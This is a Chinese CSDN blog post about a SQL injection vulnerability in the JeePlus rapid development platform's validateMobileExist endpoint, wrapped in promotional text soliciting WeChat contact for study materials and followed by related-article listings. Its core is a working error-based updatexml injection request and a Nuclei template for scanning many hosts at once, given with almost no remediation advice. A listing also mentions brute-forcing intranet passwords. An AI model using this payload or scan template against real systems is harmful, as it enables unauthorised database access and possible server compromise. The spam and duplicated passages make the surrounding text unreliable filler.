JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)

于 2024-04-15 07:57:58 发布
阅读量372 收藏 1
点赞数 6
分类专栏: 2024年程序员学习 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77033340/article/details/137763875
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

利用POC:

GET /a/sys/user/validateMobileExist?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+version%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: jeeplus.session.id=0c7c1b95a1884f668641af07a5bfde93
Upgrade-Insecure-Requests: 1

Nuclei批量检测:

id: template-id
info:
  name: Template Name
  author: xxxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /a/sys/user/validateMobileExist?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+version%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: jeeplus.session.id=0c7c1b95a1884f668641af07a5bfde93
        Upgrade-Insecure-Requests: 1


## 写在最后

**在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。**


需要完整版PDF学习资源私我





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
![img](https://img-blog.csdnimg.cn/img_convert/d6034fbb529c671a112ecf12c07bf1e3.png)

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
蓉城垡
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jeeplus快速开发平台 validateMobileExist SQL注入漏洞
0xSec
02-20 558
JeePlus快速开发平台validateMobileExist 接口存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞
云瀚安行
03-13 634
JeePlus快速开发平台validateMobile接口存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
jeeplus快速开发框架
热门推荐
chidy的专栏
08-24 7万+
刚找了份新工作,本来想走前端开发路线的,新项目算是有接触,但是没人带,一切都得自己学,而且岗位工作是研发经理,目前却是只有我一个,正在思考自己能力是够能胜任,考虑是不是要继续折腾了。工作不好找,换行更是难,且行且看吧。下面简单写点项目相关的只是吧,算是一个开头,以后要多写多思考才行。     新项目是一个基于百度地图的GIS数据展示系统,是基于Jeeplus框架,基于spring+mybatis
jeeplus-一款款可一键生成前后端代码的开发平台
m0_51429393的博客
10-13 1978
用过hasweb的朋友都知道,管理后台基于hasweb开发,能很大程度缩短开发周期。最近一个项目用到了JeePlus,发现JeePlus界面更美观,功能更强大。 Jeecg、Jeesite、Jeeplus都是比较不错的。 JeePlus,一款基于代码生成器的智能快速开发平台,采用了前后端分离、maven多模块开发,方便多人协同开发,集成了表单、模板、工作流程、代码生成、单位组织、权限管理及系统监控等等功能,可以帮助省去Java项目中80%的重复工作,让开发者有更多时间去关注业务逻辑。既能大幅度提高开发效率.
春秋云镜 CVE-2023-1313
最新发布
qq274575499的博客
04-03 955
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
基于JEE的web快速开发平台
02-22
WebBuilder是一款跨平台、数据库和浏览器的Web可视化应用开发和部署平台。 使用WebBuilder可开发ERP、OA、CRM、HR、MIS以及电信、银行、政府、企业等各行业的行业应用系统,帮助信息化管理系统的快速构建。 WebBuilder帮助提高应用系统的开发效率,并降低成本。完善的基础架构,具有应用系统必须的完整功能,使系统的开发仅需致力于业务的开发。 应用开发:提供可视化的WebBuilder集成开发环境,帮助应用系统的快速开发,支持使用Eclipse等开发工具的开发和调试,可以在您原有使用的技术框架上混合使用。 应用部署:使用基于Web的资源管理器进行应用的部署,支持Java,.Net,PHP等大部分Web应用的部署。 自定义的应用描述语言:基于XML的Web应用描述语言,屏蔽不同平台、数据库和浏览器之间的差异。 完整的组件框架:提供应用开发所需的经过封装的前后台组件、开发框架以及应用模块,集成封装了大量Ext、Dhtml、FusionCharts、标准HTML和JS组件以及包括数据访问、流程引擎、计划任务、系统调度等框架在内的Java后台组件。 使用WebBuilder可快速开发出功能强大的各种企业级应用系统,也可以基于应用系统平台做深度的二次开发
jeeplus带工作流开发框架ani.zip
09-01
1. **ORM框架集成**:JEEPLUS整合了MyBatis,提供了一种便捷的SQL操作方式,包括动态SQL、自动填充、事务控制等功能,使得数据库操作更加简单。 2. **通用Mapper**:它提供了一组通用的Mapper接口,如增删查改,...
Jeeplus源码-内置组件讲解
11-03
JeePlus是一个基于Spring Boot的快速开发框架,它为Java开发者提供了一系列内置组件,以简化常见的开发任务,提高开发效率。本文将深入讲解JeePlus中的一些核心组件及其功能。 1. 常用组件 JeePlus提供了多种常用...
Jeeplus使用文档
02-09
这篇文档将深入讲解 JeePlus 的核心特性,帮助开发快速上手并充分利用其优势。 ### 1. 平台介绍 JeePlus 是一个轻量级的 ORM(对象关系映射)框架,它扩展了 MyBatis 的基础功能,包括动态 SQL、自动化 CRUD ...
JAVA企业快速通用开发平台框架源码(基于Bootstrap的Java企业通用开发平台框架)+部署文档及视频[请勿商用]
03-31
这个开源项目提供了一个完整的JAVA企业快速通用开发平台,其核心框架是SSM,即Spring、SpringMVC和MyBatis的集成。SSM框架是Java后端开发中的常用组合,因其强大的功能和灵活性而被广大开发者所采用。Spring框架提供...
WEB应用快速开发框架及工作流平台技术文档
09-14
WEB应用快速开发框架及工作流平台技术文档
jeeplus_ani.chm文档
04-10
1. **动画API介绍**:详细讲解JEEPlus提供的动画接口和方法,如何在代码中调用和配置。 2. **示例代码**:展示如何在实际项目中实现各种动画效果,包括基本的淡入淡出、滑动效果,到更复杂的自定义动画。 3. **配置...
Cockpit upload文件上传漏洞(CVE-2023-1313)
0xSec
12-16 1801
Cockpitassetsmanager/upload接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端任意上传代码,写入后门,获取服务器权限,进而控制整个web服务器。
Vue3 + Vue-cli (1) 基础篇
小草莓的博客
01-09 5310
一、官网 Vue3 官网:https://v3.cn.vuejs.org/ Vue-cli 官网:https://cli.vuejs.org/zh/ 二、Vue3的新特性 01、Vue3 采用渐进式开发,向下兼容 02、性能提升 打包大小减少41% 初次渲染快55% 更新快133% 内存使用减少54% 03、Composition API集合,解决Vue2组件开发问题 04、新的API加入 Teleport瞬移组件 Suspense解决异步加载组件问题 05、..
Vue 3 + Vue-Cli 构建和初始化配置项目
Yuki_yuhan的博客
06-19 2438
使用 Vue 3 + Vue-Cli 构建和初始化配置项目,提供亲测可用的配置项示例,其中包含 eslintrc 文件的配置示例、prettier 配置示例、Axios 请求工具的封装、Store 配置统一导出、CSS 默认公用样式示例、Git 大小写敏感配置、VSCode 相关插件的更替等内容......
Goby 漏洞发布|Cockpit 平台 upload 文件上传漏洞(CVE-2023-1313)
m0_46699477的博客
09-28 817
Cockpit 是一个自托管、灵活且用户友好的无头内容平台,用于创建自定义数字体验。Cockpit 存在文件上传漏洞,攻击者可上传任意文件,进而导致服务器被控制等。
vue3+vue cli的使用
前端,请指教
11-19 904
创建项目 npm install -g @vue/cli 或 yarn global add @vue/cli vue create shop-mall-h5 选择配置,看个人项目需求 注意,空格键是选中与取消,A键是全选,上下键移动 TypeScript 支持使用 TypeScript 书写源码 Progressive Web App (PWA) Support PWA 支持。 Router 支持 vue-router 。 Vuex 支持 vuex 。 CSS Pre-processors 支持 C
JeePlus快速开发平台 多处 SQL注入漏洞复现
0xSec
02-07 965
JeePlus快速开发平台resetPassword、registerUser等接口存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
php脚本暴力破解网站密码(附php源代码)
qq_37910492的博客
11-30 1万+
有一种网站,没有验证码;有一种网站,你可以利用某种手段获取到登陆者的用户名(比如邮箱啦等等,用户名你是知道的),你所不知道的仅仅是登录密码,有没有什么方法可以破解呢?      我们单位有一个内网(虽是内网,但有时在家也可以登录),用户名可以搞到,密码原始是六位的数字(其实大多数人都没有修改过),而且牛叉的是,这个网站登录时,如果输入错误次数过多也不会让你输入验证码,这太好了,心中窃喜,可以用暴力...
jeeplus新手教程
08-12
当然,我可以为您提供关于JeePlus的新手教程。JeePlus是一个基于Java的开源框架,用于快速开发企业级Java应用程序。它提供了许多便捷的功能和工具,可以简化开发过程,并提高开发效率。 以下是一个简单的JeePlus新手教程的大纲: 1. 环境设置: - 安装Java开发工具包(JDK)和集成开发环境(IDE),例如Eclipse或IntelliJ IDEA。 - 下载JeePlus框架,并导入到IDE中。 2. 创建新项目: - 在IDE中创建一个新的Java项目。 - 将JeePlus框架添加到项目的依赖中。 3. 数据库配置: - 配置数据库连接,包括数据库驱动程序和连接URL。 - 创建数据库表格或使用现有表格。 4. 实体类和数据访问对象(DAO): - 创建Java实体类,映射到数据库表格。 - 创建DAO类,用于对实体类进行数据库操作,例如增删改查。 5. 业务逻辑层: - 创建服务类,实现业务逻辑。 - 在服务类中调用DAO类来操作数据库。 6. 控制器层: - 创建控制器类,处理用户请求。 - 使用注解来映射URL和方法,处理HTTP请求和响应。 7. 视图层: - 创建JSP页面,用于显示数据和与用户交互。 - 使用JSTL(JavaServer Pages标准标签库)和EL(表达式语言)来处理页面逻辑和显示数据。 8. 测试和调试: - 编写单元测试用例,确保代码的正确性。 - 使用调试工具来调试代码并解决错误。 这只是一个简单的JeePlus新手教程大纲,涵盖了基本的项目搭建和开发流程。当然,JeePlus框架还有更多高级功能和特性,您可以根据需要深入学习和应用。希望对您有所帮助!如果您有任何具体的问题,可以随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值